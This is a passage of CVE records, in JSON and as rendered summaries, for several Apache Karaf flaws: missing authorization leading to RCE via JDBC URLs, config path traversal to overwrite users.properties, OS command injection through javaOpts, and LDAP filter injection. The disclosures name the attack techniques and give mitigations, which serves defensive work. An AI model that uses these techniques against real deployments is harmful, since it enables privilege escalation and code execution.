                  "cweId": "CWE-862",
                  "description": "CWE-862",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-09-29T08:39:33.209Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://karaf.apache.org/security/cve-2026-91085.txt"
            }
          ],
          "source": {
            "discovery": "EXTERNAL"
          },
          "title": "Apache Karaf: config:install missing ACL entry allows privilege escalation to admin",
          "x_generator": {
            "engine": "Vulnogram 1.0.3"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2026-91085",
        "datePublished": "2026-09-29T08:39:33.209Z",
        "dateReserved": "2026-09-14T17:55:38.562Z",
        "dateUpdated": "2026-10-01T14:18:12.957Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-91048 (GCVE-0-2026-91048)

    Vulnerability from cvelistv5 – Published: 2026-09-29 08:34 – Updated: 2026-10-01 14:13
    VLAI
    Title
    Apache Karaf: Missing authorization on the jdbc:* shell command scope allows privilege escalation to remote code execution via jdbc:ds-create
    Summary
    The jdbc shell command scope shipped no org.apache.karaf.command.acl.jdbc.cfg. Karaf's command guard (SecuredSessionFactoryImpl) treats a command with no matching ACL rule as allowed, so any authenticated shell session (including one holding only the viewer role) could run every jdbc:* command. jdbc:ds-create stores a fully attacker-controlled JDBC URL into a pax-jdbc-config factory Configuration with no validation. pax-jdbc-config reactively turns that into a live DataSource. Several JDBC drivers run code or SQL at connection time based on URL parameters (e.g. H2 INIT=RUNSCRIPT), so a viewer-level shell user could reach arbitrary code execution, bypassing the admin-role gate that already protects shell:exec. This is a privilege-escalation-to-RCE chain, not merely an "admin misconfiguration". The same applies to jms:* shell commands.
    SSVC
    Exploitation: none Automatable: yes Technical Impact: total
    CISA Coordinator · CISA-ADP (v2.0.3)
    Decision recorded 2026-10-01 14:13 UTC
    CWE
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: 0 , < 4.4.12 (semver)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2026-09-29T09:15:44.666Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "url": "http://www.openwall.com/lists/oss-security/2026/09/28/9"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "HIGH",
                  "baseScore": 9.8,
                  "baseSeverity": "CRITICAL",
                  "confidentialityImpact": "HIGH",
                  "integrityImpact": "HIGH",
                  "privilegesRequired": "NONE",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-91048",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-10-01T14:13:10.417139Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-10-01T14:13:30.717Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "lessThan": "4.4.12",
                  "status": "affected",
                  "version": "0",
                  "versionType": "semver"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "reporter",
              "value": "MopMonk-AI \u003cmopmonk-ai@tophant.com\u003e"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "The\u0026nbsp;\u003ccode\u003ejdbc\u003c/code\u003e\u0026nbsp;shell command scope shipped no\u0026nbsp;\u003ccode\u003eorg.apache.karaf.command.acl.jdbc.cfg\u003c/code\u003e. Karaf\u0027s command guard (\u003ccode\u003eSecuredSessionFactoryImpl\u003c/code\u003e) treats a command with no matching ACL rule as \u003cb\u003eallowed\u003c/b\u003e, so any authenticated shell session (including one holding only the\u0026nbsp;\u003ccode\u003eviewer\u003c/code\u003e\u0026nbsp;role) could run every\u0026nbsp;\u003ccode\u003ejdbc:*\u003c/code\u003e\u0026nbsp;command.\u0026nbsp;\u003ccode\u003ejdbc:ds-create\u003c/code\u003e\u0026nbsp;stores a fully attacker-controlled JDBC URL into a\u0026nbsp;\u003ccode\u003epax-jdbc-config\u003c/code\u003e\u0026nbsp;factory\u0026nbsp;\u003ccode\u003eConfiguration\u003c/code\u003e\u0026nbsp;with no validation.\u0026nbsp;\u003ccode\u003epax-jdbc-config\u003c/code\u003e\u0026nbsp;reactively turns that into a live\u0026nbsp;\u003ccode\u003eDataSource\u003c/code\u003e. Several JDBC drivers run code or SQL at connection time based on URL parameters (e.g. H2\u0026nbsp;\u003ccode\u003eINIT=RUNSCRIPT\u003c/code\u003e), so a\u0026nbsp;\u003ccode\u003eviewer\u003c/code\u003e-level shell user could reach arbitrary code execution, bypassing the\u0026nbsp;\u003ccode\u003eadmin\u003c/code\u003e-role gate that already protects\u0026nbsp;\u003ccode\u003eshell:exec\u003c/code\u003e. This is a privilege-escalation-to-RCE chain, not merely an \"admin misconfiguration\".\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eThe same applies to\u0026nbsp;\u003ccode\u003ejms:*\u003c/code\u003e\u0026nbsp;shell commands.\u003c/div\u003e"
                }
              ],
              "value": "The\u00a0jdbc\u00a0shell command scope shipped no\u00a0org.apache.karaf.command.acl.jdbc.cfg. Karaf\u0027s command guard (SecuredSessionFactoryImpl) treats a command with no matching ACL rule as allowed, so any authenticated shell session (including one holding only the\u00a0viewer\u00a0role) could run every\u00a0jdbc:*\u00a0command.\u00a0jdbc:ds-create\u00a0stores a fully attacker-controlled JDBC URL into a\u00a0pax-jdbc-config\u00a0factory\u00a0Configuration\u00a0with no validation.\u00a0pax-jdbc-config\u00a0reactively turns that into a live\u00a0DataSource. Several JDBC drivers run code or SQL at connection time based on URL parameters (e.g. H2\u00a0INIT=RUNSCRIPT), so a\u00a0viewer-level shell user could reach arbitrary code execution, bypassing the\u00a0admin-role gate that already protects\u00a0shell:exec. This is a privilege-escalation-to-RCE chain, not merely an \"admin misconfiguration\".\n\n\nThe same applies to\u00a0jms:*\u00a0shell commands."
            }
          ],
          "metrics": [
            {
              "other": {
                "content": {
                  "text": "moderate"
                },
                "type": "Textual description of severity"
              },
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-862",
                  "description": "CWE-862",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-09-29T08:34:47.193Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://lists.apache.org/thread/ph3867mxh2tft75w0o1hpn10f5mbmw32"
            }
          ],
          "source": {
            "discovery": "EXTERNAL"
          },
          "title": "Apache Karaf: Missing authorization on the jdbc:* shell command scope allows privilege escalation to remote code execution via jdbc:ds-create",
          "x_generator": {
            "engine": "Vulnogram 1.0.3"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2026-91048",
        "datePublished": "2026-09-29T08:34:47.193Z",
        "dateReserved": "2026-09-14T17:14:08.734Z",
        "dateUpdated": "2026-10-01T14:13:30.717Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-91012 (GCVE-0-2026-91012)

    Vulnerability from cvelistv5 – Published: 2026-09-29 08:34 – Updated: 2026-10-01 14:10
    VLAI
    Title
    Apache Karaf: Path Traversal in Config Service Allows Manager-to-Admin Privilege Escalation
    Summary
    org.apache.karaf.config.core.impl.ConfigRepositoryImpl#update(pid, properties), which backs the "config" MBean and the config:* shell commands, derives the file it writes a configuration to from caller-supplied input without checking that the result stays inside ${karaf.etc}: * if the submitted property map contains a felix.fileinstall.filename entry, that value is turned directly into a File (getCfgFileFromProperty), so it can point to any absolute path the Karaf process can write to; * otherwise the configuration PID is concatenated verbatim into the target file name (generateConfigFilename(): new File(karaf.etc, pid + ".cfg")), so a PID containing ".." segments resolves outside ${karaf.etc}. createFactoryConfiguration() has the same issue via the factory PID/alias. Both code paths are reachable by any caller holding the "manager" role under Karaf's shipped command/JMX ACL (org.apache.karaf.command.acl.conf.cfg: "update = manager"). Such a user can therefore write attacker-controlled content to any file the Karaf process can write, including files the same ACL otherwise reserves to "admin" (etc/users.properties, etc/*.acl.*.cfg, etc/org.apache.karaf.management.cfg, and similar), allowing a manager-role user to grant themselves the admin role or otherwise take over the container. ConfigMBeanImpl.install() and the config:install shell command already guarded the equivalent risk on their own code path with a finalname.contains("..") string check, but that check does not stop absolute paths or symlink-based escapes, and it was never applied to ConfigRepositoryImpl.update() / createFactoryConfiguration() at all.
    SSVC
    Exploitation: none Automatable: yes Technical Impact: total
    CISA Coordinator · CISA-ADP (v2.0.3)
    Decision recorded 2026-10-01 14:10 UTC
    CWE
    • CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: 0 , < 4.4.12 (semver)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2026-09-29T09:15:41.656Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "url": "http://www.openwall.com/lists/oss-security/2026/09/28/8"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "HIGH",
                  "baseScore": 9.8,
                  "baseSeverity": "CRITICAL",
                  "confidentialityImpact": "HIGH",
                  "integrityImpact": "HIGH",
                  "privilegesRequired": "NONE",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-91012",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "yes"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-10-01T14:10:12.183455Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "problemTypes": [
              {
                "descriptions": [
                  {
                    "cweId": "CWE-22",
                    "description": "CWE-22 Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
                    "lang": "en",
                    "type": "CWE"
                  }
                ]
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-10-01T14:10:47.838Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "packageName": "org.apache.karaf.config.core.impl",
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "lessThan": "4.4.12",
                  "status": "affected",
                  "version": "0",
                  "versionType": "semver"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "reporter",
              "value": "n0mi1k \u003cnomilksec@gmail.com\u003e"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cdiv\u003e\u003cspan\u003eorg.apache.karaf.config.core.impl.ConfigRepositoryImpl#update(pid, properties)\u003c/span\u003e,\nwhich backs the \"config\" MBean and the config:* shell commands, derives the file\nit writes a configuration to from caller-supplied input without checking that\nthe result stays inside\u0026nbsp;\u003ccode\u003e${karaf.etc}\u003c/code\u003e:\u003c/div\u003e\u003cdiv\u003e\u003cul\u003e\u003cli\u003eif the submitted property map contains a\u0026nbsp;\u003ccode\u003efelix.fileinstall.filename\u003c/code\u003e\u0026nbsp;entry, that value is turned directly into a\u0026nbsp;\u003ccode\u003eFile\u003c/code\u003e\u0026nbsp;(\u003ccode\u003egetCfgFileFromProperty\u003c/code\u003e), so it can point to any absolute path the Karaf process can write to;\u003c/li\u003e\u003cli\u003eotherwise the configuration PID is concatenated verbatim into the target file name (\u003ccode\u003egenerateConfigFilename(): new File(karaf.etc, pid + \".cfg\")\u003c/code\u003e), so a PID containing \"..\" segments resolves outside\u0026nbsp;\u003ccode\u003e${karaf.etc}\u003c/code\u003e.\u0026nbsp;\u003ccode\u003ecreateFactoryConfiguration()\u003c/code\u003e\u0026nbsp;has the same issue via the factory PID/alias.\u003c/li\u003e\u003c/ul\u003e\u003cdiv\u003eBoth code paths are reachable by any caller holding the \"manager\" role under Karaf\u0027s shipped command/JMX ACL (\u003ccode\u003eorg.apache.karaf.command.acl.conf.cfg:\u003c/code\u003e\u0026nbsp;\"\u003ccode\u003eupdate = manager\u003c/code\u003e\"). Such a user can therefore write attacker-controlled content to any file the Karaf process can write, including files the same ACL otherwise reserves to \"\u003ccode\u003eadmin\u003c/code\u003e\" (\u003ccode\u003eetc/users.properties\u003c/code\u003e,\u0026nbsp;\u003ccode\u003eetc/*.acl.*.cfg\u003c/code\u003e,\u0026nbsp;\u003ccode\u003eetc/org.apache.karaf.management.cfg\u003c/code\u003e, and similar), allowing a manager-role user to grant themselves the admin role or otherwise take over the container.\u003c/div\u003e\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003e\u003cspan\u003eConfigMBeanImpl.install()\u003c/span\u003e\u0026nbsp;and the\u0026nbsp;\u003ccode\u003econfig:install\u003c/code\u003e\u0026nbsp;shell command already guarded the equivalent risk on their own code path with a\u0026nbsp;\u003ccode\u003efinalname.contains(\"..\")\u003c/code\u003e\u0026nbsp;string check, but that check does not stop absolute paths or symlink-based escapes, and it was never applied to\u0026nbsp;\u003ccode\u003eConfigRepositoryImpl.update()\u003c/code\u003e\u0026nbsp;/\u0026nbsp;\u003ccode\u003ecreateFactoryConfiguration()\u003c/code\u003e\u0026nbsp;at all.\u003c/div\u003e"
                }
              ],
              "value": "org.apache.karaf.config.core.impl.ConfigRepositoryImpl#update(pid, properties),\nwhich backs the \"config\" MBean and the config:* shell commands, derives the file\nit writes a configuration to from caller-supplied input without checking that\nthe result stays inside\u00a0${karaf.etc}:\n\n  *  if the submitted property map contains a\u00a0felix.fileinstall.filename\u00a0entry, that value is turned directly into a\u00a0File\u00a0(getCfgFileFromProperty), so it can point to any absolute path the Karaf process can write to;\n  *  otherwise the configuration PID is concatenated verbatim into the target file name (generateConfigFilename(): new File(karaf.etc, pid + \".cfg\")), so a PID containing \"..\" segments resolves outside\u00a0${karaf.etc}.\u00a0createFactoryConfiguration()\u00a0has the same issue via the factory PID/alias.\n\n\nBoth code paths are reachable by any caller holding the \"manager\" role under Karaf\u0027s shipped command/JMX ACL (org.apache.karaf.command.acl.conf.cfg:\u00a0\"update = manager\"). Such a user can therefore write attacker-controlled content to any file the Karaf process can write, including files the same ACL otherwise reserves to \"admin\" (etc/users.properties,\u00a0etc/*.acl.*.cfg,\u00a0etc/org.apache.karaf.management.cfg, and similar), allowing a manager-role user to grant themselves the admin role or otherwise take over the container.\n\n\n\n\n\n\nConfigMBeanImpl.install()\u00a0and the\u00a0config:install\u00a0shell command already guarded the equivalent risk on their own code path with a\u00a0finalname.contains(\"..\")\u00a0string check, but that check does not stop absolute paths or symlink-based escapes, and it was never applied to\u00a0ConfigRepositoryImpl.update()\u00a0/\u00a0createFactoryConfiguration()\u00a0at all."
            }
          ],
          "metrics": [
            {
              "other": {
                "content": {
                  "text": "important"
                },
                "type": "Textual description of severity"
              },
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-09-29T08:34:11.409Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://lists.apache.org/thread/op8trtz1qxkdwj2rjozhd9yt2yd6nhw4"
            }
          ],
          "source": {
            "discovery": "EXTERNAL"
          },
          "title": "Apache Karaf: Path Traversal in Config Service Allows Manager-to-Admin Privilege Escalation",
          "x_generator": {
            "engine": "Vulnogram 1.0.3"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2026-91012",
        "datePublished": "2026-09-29T08:34:11.409Z",
        "dateReserved": "2026-09-14T16:27:00.736Z",
        "dateUpdated": "2026-10-01T14:10:47.838Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-91006 (GCVE-0-2026-91006)

    Vulnerability from cvelistv5 – Published: 2026-09-28 10:44 – Updated: 2026-09-29 21:03
    VLAI
    Title
    Apache Karaf: OS Command Injection in Child-Instance Launch (instance:* / InstancesMBean)
    Summary
    Apache Karaf's instance-management service (InstanceServiceImpl) builds the command line used to launch a child Karaf JVM by string concatenation, then executes it through /bin/sh (Unix) or cscript (Windows). The caller-supplied javaOpts value is spliced into that string unquoted. A javaOpts value containing shell metacharacters (;, |, `, $(...)) is interpreted by the shell instead of being passed to the JVM as an option, giving arbitrary OS command execution as the Karaf process user. Reachable via the shell commands instance:create, instance:start, instance:restart, instance:change-opts, and the equivalent InstanceMBean JMX operations (createInstance, startInstance, changeJavaOpts, cloneInstance). Mitigation  * Set karaf.secured.command.compulsory.roles=admin in etc/system.properties to close the fail-open gap for all unconfigured command scopes. * Restrict which principals can reach instance:* commands and InstancesMBean via etc/users.properties role assignments. * Treat javaOpts passed to instance:create/instance:start/instance:change-opts/InstancesMBean as untrusted input only from fully-trusted operators.
    SSVC
    Exploitation: none Automatable: no Technical Impact: total
    CISA Coordinator · CISA-ADP (v2.0.3)
    Decision recorded 2026-09-29 03:55 UTC
    CWE
    • CWE-78 - Improper neutralization of special elements used in an OS command ('OS command injection')
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: 0 , < 4.4.12 (semver)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2026-09-28T13:10:12.951Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "url": "http://www.openwall.com/lists/oss-security/2026/09/28/3"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "HIGH",
                  "baseScore": 8.8,
                  "baseSeverity": "HIGH",
                  "confidentialityImpact": "HIGH",
                  "integrityImpact": "HIGH",
                  "privilegesRequired": "LOW",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                  "version": "3.1"
                }
              },
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-91006",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-09-29T03:55:20.472246Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-09-29T21:03:21.368Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "packageName": "org.apache.karaf:org.apache.karaf.instance.core",
              "product": "Apache Karaf",
              "vendor": "Apache Software Foundation",
              "versions": [
                {
                  "lessThan": "4.4.12",
                  "status": "affected",
                  "version": "0",
                  "versionType": "semver"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "type": "reporter",
              "value": "n0mi1k \u003cnomilksec@gmail.com\u003e"
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "Apache Karaf\u0027s instance-management service (\u003ccode\u003eInstanceServiceImpl\u003c/code\u003e) builds the command line used to launch a child Karaf JVM by string concatenation, then executes it through\u0026nbsp;\u003ccode\u003e/bin/sh\u0026nbsp;\u003c/code\u003e(Unix) or\u0026nbsp;\u003ccode\u003ecscript\u003c/code\u003e\u0026nbsp;(Windows). The caller-supplied\u0026nbsp;\u003ccode\u003ejavaOpts\u003c/code\u003e\u0026nbsp;value is spliced into that string unquoted. A javaOpts value containing shell metacharacters (\u003ccode\u003e;\u003c/code\u003e,\u0026nbsp;\u003ccode\u003e|\u003c/code\u003e,\u0026nbsp;\u003ccode\u003e`\u003c/code\u003e,\u0026nbsp;\u003ccode\u003e$(...)\u003c/code\u003e) is interpreted by the shell instead of being passed to the JVM as an option, giving arbitrary OS command execution as the Karaf process user.\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eReachable via the shell commands\u0026nbsp;\u003ccode\u003einstance:create\u003c/code\u003e,\u0026nbsp;\u003ccode\u003einstance:start\u003c/code\u003e,\u0026nbsp;\u003ccode\u003einstance:restart\u003c/code\u003e,\u0026nbsp;\u003ccode\u003einstance:change-opts\u003c/code\u003e, and the equivalent\u0026nbsp;\u003ccode\u003eInstanceMBean\u003c/code\u003e\u0026nbsp;JMX operations (\u003ccode\u003ecreateInstance\u003c/code\u003e,\u0026nbsp;\u003ccode\u003estartInstance\u003c/code\u003e,\u0026nbsp;\u003ccode\u003echangeJavaOpts\u003c/code\u003e,\u0026nbsp;\u003ccode\u003ecloneInstance\u003c/code\u003e).\u003c/div\u003e\u003ch3\u003eMitigation\u0026nbsp;\u003c/h3\u003e\u003cdiv\u003e\u003cul\u003e\u003cli\u003eSet\u0026nbsp;\u003ccode\u003ekaraf.secured.command.compulsory.roles=admin\u003c/code\u003e\u0026nbsp;in\u0026nbsp;\u003ccode\u003eetc/system.properties\u003c/code\u003e\u0026nbsp;to close the fail-open gap for all unconfigured command scopes.\u003c/li\u003e\u003cli\u003eRestrict which principals can reach\u0026nbsp;\u003ccode\u003einstance:*\u003c/code\u003e\u0026nbsp;commands and\u0026nbsp;\u003ccode\u003eInstancesMBean\u003c/code\u003e\u0026nbsp;via\u0026nbsp;\u003ccode\u003eetc/users.properties\u003c/code\u003e\u0026nbsp;role assignments.\u003c/li\u003e\u003cli\u003eTreat\u0026nbsp;\u003ccode\u003ejavaOpts\u003c/code\u003e\u0026nbsp;passed to i\u003ccode\u003enstance:create\u003c/code\u003e/\u003ccode\u003einstance:start\u003c/code\u003e/\u003ccode\u003einstance:change-opts\u003c/code\u003e/\u003ccode\u003eInstancesMBean\u003c/code\u003e\u0026nbsp;as untrusted input only from fully-trusted operators.\u003c/li\u003e\u003c/ul\u003e\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e"
                }
              ],
              "value": "Apache Karaf\u0027s instance-management service (InstanceServiceImpl) builds the command line used to launch a child Karaf JVM by string concatenation, then executes it through\u00a0/bin/sh\u00a0(Unix) or\u00a0cscript\u00a0(Windows). The caller-supplied\u00a0javaOpts\u00a0value is spliced into that string unquoted. A javaOpts value containing shell metacharacters (;,\u00a0|,\u00a0`,\u00a0$(...)) is interpreted by the shell instead of being passed to the JVM as an option, giving arbitrary OS command execution as the Karaf process user.\n\n\nReachable via the shell commands\u00a0instance:create,\u00a0instance:start,\u00a0instance:restart,\u00a0instance:change-opts, and the equivalent\u00a0InstanceMBean\u00a0JMX operations (createInstance,\u00a0startInstance,\u00a0changeJavaOpts,\u00a0cloneInstance).\n\nMitigation\u00a0  *  Set\u00a0karaf.secured.command.compulsory.roles=admin\u00a0in\u00a0etc/system.properties\u00a0to close the fail-open gap for all unconfigured command scopes.\n  *  Restrict which principals can reach\u00a0instance:*\u00a0commands and\u00a0InstancesMBean\u00a0via\u00a0etc/users.properties\u00a0role assignments.\n  *  Treat\u00a0javaOpts\u00a0passed to instance:create/instance:start/instance:change-opts/InstancesMBean\u00a0as untrusted input only from fully-trusted operators."
            }
          ],
          "metrics": [
            {
              "other": {
                "content": {
                  "text": "moderate"
                },
                "type": "Textual description of severity"
              },
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-78",
                  "description": "CWE-78 Improper neutralization of special elements used in an OS command (\u0027OS command injection\u0027)",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-09-28T10:44:32.652Z",
            "orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
            "shortName": "apache"
          },
          "references": [
            {
              "tags": [
                "vendor-advisory"
              ],
              "url": "https://lists.apache.org/thread/olzy0yjw82b20w59vonfjr1x7v5yzocr"
            }
          ],
          "source": {
            "advisory": "https://karaf.apache.org/security/cve-2026-91006.txt",
            "defect": [
              "https://github.com/apache/karaf/pull/2878"
            ],
            "discovery": "EXTERNAL"
          },
          "title": "Apache Karaf: OS Command Injection in Child-Instance Launch (instance:* / InstancesMBean)",
          "x_generator": {
            "engine": "Vulnogram 1.0.3"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
        "assignerShortName": "apache",
        "cveId": "CVE-2026-91006",
        "datePublished": "2026-09-28T10:44:32.652Z",
        "dateReserved": "2026-09-14T15:56:23.927Z",
        "dateUpdated": "2026-09-29T21:03:21.368Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-90979 (GCVE-0-2026-90979)

    Vulnerability from cvelistv5 – Published: 2026-09-28 09:34 – Updated: 2026-09-30 19:53
    VLAI
    Title
    Apache Karaf: LDAP filter injection in JAAS LDAP login modules
    Summary
    LDAPCache and LDAPBackingEngine build LDAP search filters for user lookup and role lookup by textually substituting the placeholders %u, %dn, and %fqdn (drawn from the login name, the resolved user DN, and its fully qualified namespace form) into administrator-configured filter templates (userFilter, roleFilter). Before the fix, the only sanitization applied to the substituted value was double backslashed: filter = filter.replaceAll(Pattern.quote("%u"), Matcher.quoteReplacement(user)); filter = filter.replace("\\", "\\\\"); This does not escape the other characters RFC 4515 requires escaping in an LDAP search filter: *, (, ), and NUL. A login name containing any of these can change the structure of the resulting filter rather than being matched as a literal value (e.g. a crafted username can turn an equality match into a wildcard match, or close/reopen filter clauses), widening what the search returns and potentially causing a login or role lookup to match an LDAP entry other than the intended one, over-granting roles, and depending on deployment-specific filter templates, potentially affecting which account a login resolved to. It's not exploitable through every entry points: LDAPLoginModule and LDAPPubkeyLoginModule both called Util.doRFC2254Encoding() (correct RFC 4515 escaping) on the login name before handing it to LDAPCache, which masked the missing escaping in LDAPCache for those two call paths. Using LDAPCache directly (bypassing the login modules) does not reproduce through the normal LDAPLoginModule/LDAPPubkeyLoginModule authentication flow for this reason. It does reproduce through two other call paths that reach LDAPCache/LDAPBackingEngine without any prior escaping: * GSSAPILdapLoginModule passes the NameCallback name straight through, unescaped. * LDAPBackingEngine (listRoles) passes principal.getName() straight through, unescaped.
    SSVC
    Exploitation: none Automatable: yes Technical Impact: partial
    CISA Coordinator · CISA-ADP (v2.0.3)
    Decision recorded 2026-09-30 19:53 UTC
    CWE
    • CWE-90 - Improper neutralization of special elements used in an LDAP query ('LDAP injection')
    Impacted products
    Vendor Product Version
    Apache Software Foundation Apache Karaf Affected: 0 , < 4.4.12 (semver)
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2026-09-28T13:10:12.005Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "url": "http://www.openwall.com/lists/oss-security/2026/09/28/2"
              }
            ],
            "title": "CVE Program Container"
          },
          {
            "metrics": [
              {
                "cvssV3_1": {
                  "attackComplexity": "LOW",
                  "attackVector": "NETWORK",
                  "availabilityImpact": "LOW",
                  "baseScore": 7.3,
                  "baseSeverity": "HIGH",
                  "confidentialityImpact": "LOW",
                  "integrityImpact": "LOW",
                  "privilegesRequired": "NONE",
                  "scope": "UNCHANGED",
                  "userInteraction": "NONE",
                  "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
                  "version": "3.1"
                }
              },
              {
